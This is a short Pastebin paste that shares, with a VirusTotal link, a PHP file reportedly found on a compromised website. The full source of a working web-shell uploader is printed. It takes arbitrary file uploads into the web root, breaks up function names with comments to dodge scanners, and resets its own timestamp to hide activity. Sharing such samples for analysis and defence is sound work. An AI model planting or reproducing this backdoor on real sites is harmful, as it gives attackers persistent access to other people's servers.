Advertisement
Guest User

Untitled

a guest
Dec 19th, 2014
328
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.02 KB | None | 0 0
  1. php file found on compromised website
  2. https://www.virustotal.com/en/file/5aa8e87fc877cf23a0323ac5d1acae793dba97a9918063aca4a88cd44c072674/analysis/
  3. ---------------------------------------------------------------
  4.  
  5. <html>
  6. <head>
  7. <meta http-equiv="Content-Type" content="text/html; charset=windows-utf-8">
  8. <title>yo</title>
  9. </head>
  10. <body>
  11. <?php
  12. print '<h1>#p@$c@#</h1>\n';
  13. echo "Your IP: ";
  14. echo $_SERVER['REMOTE_ADDR'];
  15. echo "<form method=\"post\" enctype=\"multipart/form-data\">\n";
  16. echo "<input type=\"file\" name=\"filename\"><br> \n";
  17. echo "<input type=\"submit\" value=\"LOAD\"><br>\n";
  18. echo "</form>\n";
  19.  
  20. if ( isset($_FILES["filename"]) )
  21. {
  22. if(is_uploaded_file/*;*/($_FILES["filename"]["tmp_name"]))
  23. {
  24. move_uploaded_file/*;*/($_FILES["filename"]["tmp_name"], $_FILES["filename"]["name"]);
  25. $file = $_FILES/*;*/["filename"]["name"];
  26. echo "<a href=\"$file\">$file</a>";
  27. } else {
  28. echo("empty");
  29. }
  30. $filename = $_SERVER['SCRIPT_FILENAME'];
  31. touch/*;*/($filename, time());
  32. }
  33.  
  34.  
  35. ?>
  36. </body>
  37. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement